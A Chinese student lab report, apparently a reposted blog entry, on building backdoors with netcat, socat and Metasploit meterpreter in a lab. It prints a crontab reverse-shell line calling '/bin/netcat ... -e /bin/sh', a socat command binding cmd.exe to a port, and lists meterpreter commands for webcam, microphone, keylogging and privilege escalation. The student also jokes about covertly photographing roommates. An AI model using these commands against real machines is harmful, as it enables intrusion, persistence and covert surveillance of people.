20155308 《網絡攻防》 Exp2 後門原理與實踐

20155308 《網絡攻防》 Exp2 後門原理與實踐

學習內容:使用nc實現win,mac,Linux間的後門鏈接linux

:meterpraeter的應用web

:MSF POST 模塊的應用shell

學習目標:創建一個後門鏈接是如此的簡單,功能又如此強大。經過親手實踐並瞭解這一事實,從而提升本身的安全意識 。vim

基礎問題回答

  1. 例舉你能想到的一個後門進入到你係統中的可能方式?
  • 在網上下載軟件的時候,有一些捆綁軟件一塊兒下載;
  • 在輸入網頁的時候不當心打錯了地址,而後進入了一個和本身目標網頁類似的攜帶木馬的網站。
  • 網頁上彈出的小廣告,在關閉的時候,不當心點進去。
  • 本身的U盤被人植入了木馬

2.例舉你知道的後門如何啓動起來(win及linux)的方式?windows

  • 對後門程序進行假裝,誘騙用戶點擊啓動;

3.Meterpreter有哪些給你映像深入的功能?安全

  • 直接經過指令獲取主機的攝像頭讓我佷感興趣,以爲若是這塊命令掌握的好的話,能夠偷偷照點室友的醜照。

4.如何發現本身有系統有沒有被安裝後門?網絡

  • 常常查看本身的文件夾有沒有陌生的文件。可是這個辦法很笨。。。
  • 檢查防火牆開啓的端口和它對應的進程,若是不是系統默認開啓的端口都有嫌疑,找到對應的進程,對其進行抓包分析;
  • 下載監控軟件,看是否存在異常。

NC 或 netcat

是一個底層工具,進行基本的TCP UDP數據收發。常被與其餘工具結合使用,起到後門的做用。tcp

  • Linux: 通常自帶netcat,"man netcat" 或"man nc"可查看其使用說明。
  • Windows: 課程主頁附件中下載ncat.rar解壓便可使用。
  • Mac: 系統自帶,"man nc",查看其使用說明。編輯器

    Win得到Linux Shell

  • 在Windows下,先使用ipconfig指令查看本機IP工具


  • 課程主頁附件中下載ncat.rar解壓便可使用。
  1. windows 打開監聽

  1. Linux反彈鏈接win

  1. windows下得到一個linux shell,可運行任何指令,如ls

Linux得到Windows Shell

  • 在Kali環境下用ifconfig查看IP

  1. Linux運行監聽指令

  1. Windows反彈鏈接Linux

  1. Linux下看到Windows的命令提示

nc傳輸數據

  • Windows下監聽5308端口

  • Kali下鏈接到Windows的5308端口

  • 數據傳輸成功!


實驗內容

使用netcat獲取主機操做Shell,cron啓動

  • 在Windows系統下,監聽5308端口

  • 在Kali環境下,使用man crontab指令查看crontab命令的幫助文檔,從文檔中咱們能夠知道crontab指令能夠用於設置週期性被執行的指令。該命令從標準輸入設備讀取指令,並將其存放於crontab文件中,以供以後讀取和執行

  • 用crontab -e指令編輯一條定時任務,選擇編輯器時選擇基本的vim編輯器

  • 在最後一行添加32 * * * * /bin/netcat 192.168.44.129 5208 -e /bin/sh,意思是在每一個小時的第32分鐘反向鏈接Windows主機的5308端口

  • 32分後,此時已經得到了Kali的shell,能夠輸入指令輸出結果:

作到這部分的以後,我在虛擬機上下載server 2008,kali直接崩掉了,我又從新下載了一次kali,地址就變化了。新的地址是

使用socat獲取主機操做Shell, 任務計劃啓動

預備知識;

  • socat是ncat的加強版,它使用的格式是socat [options] ,其中兩個address是必選項,而options 是可選項。

  • socat的基本功能就是創建兩個雙向的字節流,數據就在其間傳輸,參數address就是表明了其中的一個方向。所謂流,表明了數據的流向,而數據則能夠有許多不一樣的類型,命令中也就相應須要許多選項對各類不一樣的類型數據流進行限定與說明。

實踐過程:

  1. 在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器:

  1. 在操做->程序或腳本中選擇你的socat.exe文件的路徑,在添加參數一欄填寫tcp-listen:5308 exec:cmd.exe,pty,stderr,這個命令的做用是把cmd.exe綁定到端口5308,同時把cmd.exe的stderr重定向到stdout上:

  1. 建立完成以後,按Windows+L快捷鍵鎖定計算機,再次打開時,能夠發現以前建立的任務已經開始運行:

此時能夠發現已經成功得到了一個cmd shell

使用MSF meterpreter生成可執行文件,利用ncat或socat傳送到主機並運行獲取主機Shell

1.輸入指令生成後門程序:

2.經過nc指令將生成的後門程序傳送到Windows主機上:


3.在Kali上使用msfconsole指令進入msf控制檯,使用監聽模塊,設置payload,設置反彈回連的IP和端口:

4.設置完成後,執行監聽:

5.打開Windows上的後門程序:

6.此時Kali上已經得到了Windows主機的鏈接,而且獲得了遠程控制的shell:

使用MSF meterpreter生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容,並嘗試提權

  1. 使用record_mic指令能夠截獲一段音頻:

  1. 使用webcam_snap指令可使用攝像頭進行拍照:

  1. 使用webcam stream指令可使用攝像頭進行錄像:

  1. 使用screenshot指令能夠進行截屏:

  1. 使用keyscan_start指令開始記錄下擊鍵的過程,使用keyscan_dump指令讀取擊鍵的記錄:

  1. 先使用getuid指令查看當前用戶,使用getsystem指令進行提權,如圖所示,提權成功

體會

本次實驗比較簡單,可是主要的是本身在操做上有很大的問題,而後作到最後,虛擬機由於同時運行不少的虛擬機,因此係統卡了,整個虛擬機崩了。我就作了好幾遍,纔出來如今的效果。經過本次實驗,我遇到了不少的問題,其中一些的問題,是同窗們都沒遇到,我上網也查了,也不知道怎麼解決。。。。。。可是後來我發現,有的時候重開虛擬機,不少問題就莫名其妙就解決了,這也是讓我很無語的地方。

相關文章
相關標籤/搜索